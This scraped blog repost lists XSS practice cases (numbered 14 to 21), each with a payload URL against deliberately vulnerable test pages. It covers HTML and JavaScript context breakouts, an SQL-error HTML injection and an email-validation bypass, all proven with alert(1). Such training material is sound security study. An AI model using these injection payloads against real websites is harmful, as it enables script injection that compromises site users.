zoukankan      html  css  js  c++  java
  • Multi Reflection (Pro Only)

    Case 14 - Double Injection in HTML Context with Double Quotes

    https://brutelogic.com.br/multi/double-html.php?p="</a><svg onload=alert(1)>

    Case 15 - Double Injection in Mixed Context (HTML + JS) with Default Quotes

    https://brutelogic.com.br/multi/double-mixed.php?p="</a><svg onload=alert(1)>

    Case 16 - Quoteless Inline Double Injection in JS variables

     https://brutelogic.com.br/multi/js-inline.php?p=;alert(1)//


    Case 17 - Quoteless Inline Double Injection in JS object

    https://brutelogic.com.br/multi/js-object.php?p=};alert(1)//


    Case 18 - Quoteless Inline Double Injection in JS object with Nested Array

    https://brutelogic.com.br/multi/js-object2.php?p=}]};alert(1)//

    Case 19 - Quoteless Inline Double Injection in JS object with Nested Function

    https://brutelogic.com.br/multi/js-object3.php?p=}}};alert(1)//

    Special Cases (Pro Only)

    Case 20 - SQLi error-based HTML Injection

    http://testphp.vulnweb.com/listproducts.php?cat=1"

    Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '€œ' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 

    http://testphp.vulnweb.com/listproducts.php?cat=1"<svg onload=alert(1)>

    Case 21 - PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

    https://brutelogic.com.br/tests/email.php?email="<script>alert(1);</script>"@brutelogic.com.br

  • 相关阅读:
    js18
    js17
    js16
    js15
    js14
    js13
    js12
    js11
    八月二十三的php
    八月二十二的php
  • 原文地址:https://www.cnblogs.com/hack404/p/10722383.html
Copyright © 2011-2022 走看看